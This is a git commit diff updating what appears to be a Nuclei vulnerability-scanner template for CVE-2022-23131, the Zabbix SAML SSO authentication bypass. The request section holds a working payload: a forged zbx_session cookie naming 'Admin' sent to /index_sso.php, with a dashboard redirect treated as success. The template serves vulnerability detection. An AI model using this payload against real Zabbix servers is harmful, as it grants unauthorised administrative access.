metadata update
parent
ae6d460743
commit
9aa0e6be8a
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2022-23131
|
||||
|
||||
info:
|
||||
name: Zabbix Saml Bypass
|
||||
name: Zabbix - SAML SSO Authentication Bypass
|
||||
author: For3stCo1d
|
||||
severity: high
|
||||
description: In the case of instances where the SAML SSO authentication is enabled (non-default), session data can be modified by a malicious actor, because a user login stored in the session was not verified.
|
||||
|
@ -14,22 +14,21 @@ info:
|
|||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2022-23131
|
||||
tags: cve,cve2022,zabbix
|
||||
tags: cve,cve2022,zabbix,auth-bypass
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET /index_sso.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Cookie: zbx_session=eyJzYW1sX2RhdGEiOnsidXNlcm5hbWVfYXR0cmlidXRlIjoiQWRtaW4ifSwic2Vzc2lvbmlkIjoiIiwic2lnbiI6IiJ9
|
||||
|
||||
- |
|
||||
GET /index_sso.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Cookie: zbx_session=eyJzYW1sX2RhdGEiOnsidXNlcm5hbWVfYXR0cmlidXRlIjoiQWRtaW4ifSwic2Vzc2lvbmlkIjoiIiwic2lnbiI6IiJ9
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 302
|
||||
- type: word
|
||||
words:
|
||||
- 'Location: zabbix.php?action=dashboard.view'
|
||||
part: header
|
||||
|
||||
- type: dsl
|
||||
dsl:
|
||||
- "contains(tolower(all_headers), 'location: zabbix.php?action=dashboard.view')"
|
||||
|
|
Loading…
Reference in New Issue